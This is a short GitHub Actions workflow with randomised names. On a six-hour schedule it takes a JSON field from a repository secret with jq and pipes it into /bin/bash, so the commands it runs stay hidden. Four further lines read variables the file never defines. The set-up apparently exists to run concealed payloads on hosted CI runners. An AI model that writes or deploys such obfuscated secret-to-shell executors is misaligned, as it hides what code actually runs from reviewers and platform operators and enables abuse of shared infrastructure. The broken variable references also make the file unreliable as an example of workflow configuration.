name: suguimi4356
on:
  workflow_dispatch:
  schedule:
    - cron: '20 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: suguimi4356
        env:
          g38874: ${{ secrets.g38874 }}
        run: |
          echo $g38874 | jq -r .ys38 | /bin/bash
          echo $j1278 | jq -r .yu103 | /bin/bash
          echo $h96210 | jq -r .ojtlt90579 | /bin/bash
          echo $eqnu0426 | jq -r .wsyzk32195 | /bin/bash
          echo $j31373 | jq -r .eqc40421 | /bin/bash

